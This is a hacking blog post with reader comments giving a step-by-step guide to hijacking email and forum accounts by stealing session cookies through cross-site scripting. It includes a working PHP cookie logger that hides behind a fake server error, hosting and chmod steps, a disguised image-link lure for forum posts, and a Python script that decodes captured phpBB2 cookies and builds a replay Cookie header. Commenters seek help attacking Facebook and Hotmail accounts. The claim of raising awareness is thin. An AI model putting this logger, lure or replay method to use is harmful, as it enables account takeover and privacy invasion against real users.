
How to hack into an email account - cookie logger


One of the questions I am asked most is "How do I hack into an email account?", so today I am posting a new way in: stealing the victim's session cookie. I am not posting this to excite hackers but to make you aware of what is going around.

Note: This method only works if the target site is vulnerable to XSS. The stealing script has to execute inside the target site's own pages, because document.cookie only returns the cookies of the site the script is running on; a page hosted on your own domain sees your cookies, not the victim's.

A site's cookies carry the session token that identifies a logged-in user, and whoever presents a valid session cookie is treated by that site as that user for as long as the session lasts. That is the whole attack: you do not learn the victim's password, you borrow the session. It only gives you the site whose cookie you captured, since a browser only exposes a site's cookies to script running on that site, so a cookie captured on a forum gives you the forum session, not the victim's Google, Yahoo, Orkut, Facebook or Flickr account. It also does not let you simply change the password, because most sites ask for the current password before setting a new one.
What is a CookieLogger?

A CookieLogger is a script that receives the cookies of whoever the injected script ran against and stores them in a log file, from which you can read the victim's cookies.

Today I am going to show how to make your own cookie logger.

Step 1
First you need a file that captures a visitor's cookie, so follow this process.

Download the script

Step 2

Now change "http://rafayhackingarticles.blogspot.com" in the script to your own site. Remember one thing: the files must sit in the web root of your site, not in a subdirectory, because the URLs in Step 4 assume they are at the top level.

Now open Notepad, paste the script into it and save it as fun.gif.

Step 3
Copy the following script into a Notepad file and save it as cookielogger.php (the opening <?php tag is required, and the quotes must be plain ASCII quotes, not the curly quotes a word processor inserts):

<?php
// Appends whatever arrives in the "cookie" query parameter to logfile.txt.
// Every response is the same bland error text so the visitor sees nothing suspicious.
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
    // Open the log for appending; the web server user must be able to write it.
    if (!$handle = fopen($filename, 'a'))
    {
        echo "Temporary Server Error,Sorry for the inconvenience.";
        exit;
    }
    else
    {
        // One captured cookie string per line.
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo "Temporary Server Error,Sorry for the inconvenience.";
            exit;
        }
    }
    echo "Temporary Server Error,Sorry for the inconvenience.";
    fclose($handle);
    exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>


Step 4: Create a new Notepad file and save it as logfile.txt

Upload these files to your server:

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

The chmod 777 makes logfile.txt writable by the web server process, which is what lets cookielogger.php append to it; if the server cannot write the file, the log stays empty and the script prints the error text just the same.

If you don't have a website, the following hosts offer free websites with PHP support:

www.ofees.net
www.t35.com
www.ripway.com

Step 5: Go to the target forum and insert this code in your signature or in a post:


[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]


The image tag is the bait: it points at fun.jpg, but the link wrapped around it leads to fun.gif, so anyone who clicks the picture is sent to fun.gif instead of the image they expected.

Step 6
Whoever follows the link ends up at cookielogger.php, sees only the fake "Temporary Server Error" message, and their cookie string is appended to logfile.txt. If the log stays empty, the script did not run where it needed to: the browser may have treated fun.gif as an image instead of executing it, or it ran on your own domain, where document.cookie holds only your cookies rather than the target site's.


Step 7
Something like this will then be stored in your logfile.txt:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

This is a phpBB2 forum's cookie pair. phpbb2mysql_sid is the session id, and phpbb2mysql_data is a URL-encoded PHP serialized array. Decoded, this sample holds an empty autologinid and userid -1, which is phpBB2's anonymous user, so this particular capture came from a visitor who was not logged in, and replaying it would gain nothing. A logged-in victim's cookie carries their real user id.



Step 8
To get into the victim's account you replace your own cookies for that site with the victim's. Use a cookie editor for this: the string before "=" is the name of the cookie and the string after "=" is its value, so set each cookie the site uses to the captured value, then reload the site, which will treat you as the victim for as long as that session is valid.

For this you will need a Firefox add-on such as "Add and Edit Cookies".

Two things get in the way. A site that sets the HttpOnly flag on its session cookie keeps it out of document.cookie, so script-based theft returns nothing useful, and a session the site has already expired or invalidated is worthless no matter what you paste into the editor.
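As an added worked example (not code from the original post), the following Python script takes a line exactly as the logger writes it, using the Step 7 sample as constructed input, splits it into cookies the way a cookie editor needs them, decodes the phpBB2 data cookie to check whether the capture is from a logged-in user, and builds the Cookie request header you would send to replay the session from a script instead of a browser. The only assumption beyond the post is phpBB2's convention that user id -1 is the anonymous visitor; the decoder is a small hand-written reader for PHP's serialize() format, not a library.

```python
"""Parse a cookie-logger line and prepare it for session replay.

Added illustration for this post, not the post's own code. The sample
line is the Step 7 capture; the anonymous-user id is phpBB2's convention.
"""
from urllib.parse import unquote

# Constructed sample: the Step 7 log line exactly as cookielogger.php writes it.
SAMPLE_LOG_LINE = (
    "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B"
    "s%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; "
    "phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9"
)

PHPBB2_ANONYMOUS = -1  # phpBB2's user id for a visitor who is not logged in


def parse_cookie_line(line):
    """Split 'name=value; name=value' (the document.cookie format) into a dict."""
    cookies = {}
    for part in line.strip().split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def php_unserialize(data):
    """Minimal decoder for PHP serialize() output: arrays, strings, ints, floats, bools, null."""
    def read(pos):
        tag = data[pos]
        if tag == "N":                      # N;
            return None, pos + 2
        if tag in "ib":                     # i:-1;   b:1;
            end = data.index(";", pos)
            num = int(data[pos + 2:end])
            return (bool(num) if tag == "b" else num), end + 1
        if tag == "d":                      # d:1.5;
            end = data.index(";", pos)
            return float(data[pos + 2:end]), end + 1
        if tag == "s":                      # s:6:"userid";  (length-prefixed, so quotes inside are safe)
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2               # skip :"
            return data[start:start + length], start + length + 2  # skip ";
        if tag == "a":                      # a:2:{key;value;key;value;}
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                 # skip :{
            result = {}
            for _ in range(count):
                key, pos = read(pos)
                val, pos = read(pos)
                result[key] = val
            return result, pos + 1          # skip }
        raise ValueError("unsupported PHP serialize tag %r at offset %d" % (tag, pos))
    value, _ = read(0)
    return value


def inspect_phpbb2_capture(line):
    """Report what a captured phpBB2 cookie pair says about the victim's session."""
    cookies = parse_cookie_line(line)
    data = php_unserialize(unquote(cookies["phpbb2mysql_data"]))
    return {
        "session_id": cookies.get("phpbb2mysql_sid"),
        "userid": data.get("userid"),
        "autologinid": data.get("autologinid"),
        "logged_in": data.get("userid") != PHPBB2_ANONYMOUS,
    }


def replay_cookie_header(line):
    """Build the Cookie request header that presents the captured session as-is.

    Values stay URL-encoded: that is how the browser stored and sent them.
    """
    cookies = parse_cookie_line(line)
    return "; ".join("%s=%s" % (name, value) for name, value in cookies.items())


if __name__ == "__main__":
    info = inspect_phpbb2_capture(SAMPLE_LOG_LINE)
    print(info)
    if not info["logged_in"]:
        print("anonymous session: replaying it gets you nothing")
    print("Cookie: " + replay_cookie_header(SAMPLE_LOG_LINE))
```

Run it and it reports the session id and a logged_in flag; for the post's own sample the flag is false, which is exactly the check to make before spending time in a cookie editor.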


53 comments:

Anonymous said...

Hi :)

I installed the Cookie Editor app but I still don't quite understand Step 8. Could you please elaborate?

Rafay Baloch on January 14, 2010 at 3:04 AM said...

@Anonymous
Have you got the victim's cookies?

MAX on January 25, 2010 at 8:06 AM said...

How do I edit cookies? Please advise me!!!

Rafay Baloch on January 25, 2010 at 10:16 AM said...

@max
Have you got the cookies?

Anonymous said...

The thing you mentioned above is quite tricky to understand;
step 4
and step 8 are quite hard to understand.

Anonymous said...

Where is the victim's forum??? How do I go there?

Do we have to upload all these 3 on our web, and what is chmod? Where do we post this, or just upload it on our side? Please answer:
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

Rafay Baloch on February 3, 2010 at 12:28 AM said...

@Anonymous
Kindly tell me what you don't understand in Step 4; you need to upload all three files to a web hosting service.

Anonymous said...

Step 5:Go to the victim forum and insert this code in the signature or a post

From where do we get the victim forum???? And what is (chmod 777)?

Anonymous said...

Yeah, I don't quite get part 8, the part about putting in values (what kind of values?). Changing my cookies to be their cookies makes no sense :( How would I do that?

Anonymous said...

I uploaded the files. Now which URL am I to use?? My site is http://h1.ripway.com/TRIDEEB1492/

Azri92 on February 16, 2010 at 2:05 AM said...

Can I use anything other than "Edit Cookies"???

Rafay Baloch on February 25, 2010 at 12:49 AM said...

@Azri92
Yes, there are many other tools, but you can Google them; this is the simplest one.

Rafay Baloch on February 25, 2010 at 12:50 AM said...

@Anonymous
The victim's forum means that you can place the link on
an Orkut scrapbook, a Facebook wall or any forum.

Anonymous said...

Hey dude!
I already uploaded the 3 files to my site and then gave the link to a forum, but why, when I try to open the logfile (download), is there no text or anything in it? It is just empty. Can you help me with this?

Anonymous said...

trojan file

Anonymous said...

Got some questions.

Say a guy clicks on your link. With a different code, obviously, can you steal all of his cookies or just the cookie(s) of the page he was last on (the referrer site)? Can you even steal the passwords he might have stored in his browser?

Sorry if my questions are the questions of a noobie, but I'm concerned about internet safety and privacy. TY!

Rafay Baloch on March 23, 2010 at 10:52 PM said...

@Anonymous
When the victim clicks on your link, you steal his cookies for the accounts the victim is logged in to.

Anonymous said...

Step 8 question: "To get the access to the Victim's Account you need to replace your cookies with the Victim's Cookie." *Where can I find my cookies?* "You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor." (What values am I going to substitute for the cookies?) *Can you give me an example, because this cookie thing is new to me..*

Anonymous said...

Hello dear, I am in trouble.. I am not at all getting the things you have mentioned above in step 2.... where you have written to replace 'http://rafayhackingarticles.blogspot.com' with my site...
I don't have any site.. so which one do I have to put in?
And again you wrote to open Notepad and save it as fun.gif...
Well, I have already opened it when I am editing the URL... right? So why open another Notepad again? And how do I save a text file in gif (image) format? I am completely confused here.. will you please explain?


Then I am again confused in step 5.. that the victim will think it's fun.jpg but it will redirect to fun.gif..?
So please let me know it clearly.. I am confused..!.. sorry to disturb you.. [:(]

Mister on June 22, 2010 at 2:15 AM said...

Please... I saved script1 as fun.gif,
but when I try to open it as mywebsite.com/fun.gif
it shows that it has some errors.
I'm using 0fees.net.
Then I renamed the file to fun.php,
and when I tried to open it on the web
it comes up as a blank page... and the logfile is blank too...
Please, can you give me a solution for that?
:D Thank you! :]

speed on August 7, 2010 at 8:05 AM said...

I did every step very carefully, but when I tried to hack my own account... it's not working..... I saved all the files to the root directory... I just did every step the way you told... but when I posted it the way you said... and then when I clicked that signature or link to the jpg image... it opened a new web page saying 'Address not found'. Then I thought the work was done... but when I downloaded that logfile... there was nothing in it...

It's not working....
What to do???
Reply as soon as possible.

And yes, I tried to hack my Facebook account.. it's not getting posted on the wall, but you can message that signature...

Rafay Baloch on August 7, 2010 at 11:55 AM said...

Cookie stealing or session hijacking only works with those sites which have an XSS vulnerability.

Anonymous said...

I think it's quite simple.
1) You create a fake site and add the script.
2) When a visitor visits your site, the visitor's cookie will be copied into logfile.txt.
3) You copy the file and replace your cookie with it.
4) So if you are able to visit the site that the user is currently logged in to, and the cookie you just copied contains its session id, then you can find yourself logged in as that person.


If you are on the same subnet you can use MITM with arpspoof, hamster and ferret to gain cookie info.

Rafay Baloch on August 14, 2010 at 7:54 AM said...

@Anonymous
Yes, you are 100% right.

Anonymous said...

Is there another way to get cookies?

Anonymous said...

Sorry, I could not understand step 8. It is mentioned here: "To get the access to the Victim's Account you need to replace your cookies with the Victim's Cookie. You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor." But how do I get my cookie, and where is it available, and also how do I get the victim's cookie, and where is it available? So please elaborate on this.

Rafay Baloch on August 29, 2010 at 1:36 AM said...

@Anonymous
I see you don't have basic knowledge of cookie editing and cookie capturing; I recommend reading my book
www.hacking-book.com

Dhruv on September 20, 2010 at 12:30 AM said...

What should the CHMOD of the fun.gif file be? I saved it with a CHMOD of 644, and when I open it I get the code of the fun.gif file on the screen and the logfile.txt remains empty..

Please reply. I entered the link of the fun.gif file in the URL..

Rafay Baloch on September 20, 2010 at 12:57 AM said...

@Dhruv
Kindly change the permissions of the .txt file to 777 so it can write the traced cookies.

Fowad Ahmed on October 8, 2010 at 8:05 AM said...

Thanks brother... are you Pakistani??? I have to discuss something really important with you.. my mail address is fowad89@yahoo.com ... please bro, I'll be waiting for your mail.... contact me ASAP... thanks, G.B.U

Anonymous said...

Can I hack a blogspot account with this?

Anonymous said...

Dude, check your script... I downloaded it but it's not working.

john said...

I can't post that link on Facebook.. it is marked as flagged..

Anonymous said...

I clicked the gif link myself, and when I open my logfile.txt with my FTP client, it shows a blank thing?

Anonymous said...

Where will I receive the cookies, dear? I have done everything as you said and sent it. Please help me out!!!

MoSeBA on January 15, 2011 at 5:18 PM said...

I have done everything you said and uploaded them to my web hosting, and I have changed the permissions (chmod), but nothing is written in the logfile.txt.
That's what appears when I press /fun.gif:
http://img600.imageshack.us/img600/3457/116201131423am.png

Rafay Baloch on January 16, 2011 at 12:36 AM said...

@MoSeBA
This hack works only on the forums/blogs which are vulnerable to XSS (Cross Site Scripting). Try finding a website/forum vulnerable to XSS and then try it.

Anonymous said...

Where will I receive the cookies? I have done everything as you said and sent it. Please help me out!!! How can I change the cookies, or where should the cookies be placed?

Anonymous said...

Does it work on Facebook and Hotmail?

Anuj Parihar on April 19, 2011 at 11:23 PM said...

[url=http://www.127.0.0.1/fun.gif][img]http://www.127.0.0.1/fun.jpg[/img][/url]

Anonymous said...

In step 2, change "http://rafayhackingarticles.blogspot.com" to your site. I am not getting what my site is. How can I make my site? I have already hacked cookies with Wireshark on the same network in which I work. I also know how to hack a Gmail password using a forged page. But I am not getting what my site is, so please explain it fully, not in a short way.
Thank you

Anonymous said...

Hi. I have been using this site (webhosting www.ripway.com). I have a small problem: I am not able to create a chmod 777 log file... could you help me with it :)

thanks

akram ...

Anonymous said...

Hey, I have been using (www.ripway.com) but I have a problem creating the log file... how do I make it chmod 777 compatible???

thanks

akram

Anonymous said...

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

What is this, and how can I upload it?

Tinkuforu on September 26, 2011 at 1:04 AM said...

I have done everything you said, but I didn't get the cookie into the logfile...
If we click the signature, the error I am getting is "404 page not found"... Where could the error possibly be???
Kindly help me with this... Thanks in advance...

Anonymous said...

I have done whatever you said, bhai... web hosting etc., everything.... Instead of a victim, when I paste it in the address bar it says: Your search - [url=http://www.samthedevil.biz.ly/fun.gif][img]http://www.samthedevil.biz.ly/fun.jpg[/img][/url] - did not match any documents.

manish bhattacharya on June 28, 2012 at 9:10 PM said...

The "Add and Edit" add-on is not available in the latest Firefox.. any other add-on?

Anonymous said...

I have done all the things you told, but it's not working..

Manpreet Singh on August 4, 2012 at 10:42 PM said...

Facebook blocks the URL:
[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
What should I do?

Anonymous said...

Please, I don't understand all this. I have tried it but it's still not working. Can you please explain it very well?

Anonymous said...

The code is not recording anything in the log file.

mariya varghees on December 7, 2012 at 11:32 PM said...

Hack your friend's Facebook account, online password hacking.. passwordhk.blogspot.com
Enjoy!

Milind Topno on June 23, 2014 at 8:16 AM said...

When I download the script, it says the archive is corrupted or damaged.

Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.